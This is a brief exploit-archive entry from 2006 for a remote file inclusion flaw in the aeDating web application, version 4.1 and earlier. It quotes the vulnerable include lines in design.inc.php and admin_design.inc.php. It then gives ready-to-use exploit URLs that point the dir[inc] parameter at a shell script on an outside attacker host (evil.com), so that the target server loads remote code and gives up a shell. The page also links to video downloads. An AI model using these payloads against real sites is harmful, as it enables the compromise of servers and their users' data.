aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities
# Published : 2006-09-16
# Author : NeXtMaN
# Previous Title : PhpNews 1.0 (Include) Remote File Include Vulnerabilities
# Next Title : GNUTURK <= 2G (t_id) Remote SQL Injection Exploit

AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?

Video:
http://rapidshare.de/files/33316468/AEDating_SQL.rar.html
http://www.megaupload.com/?d=O1W4DX97

# www.Syue.com [2006-09-16]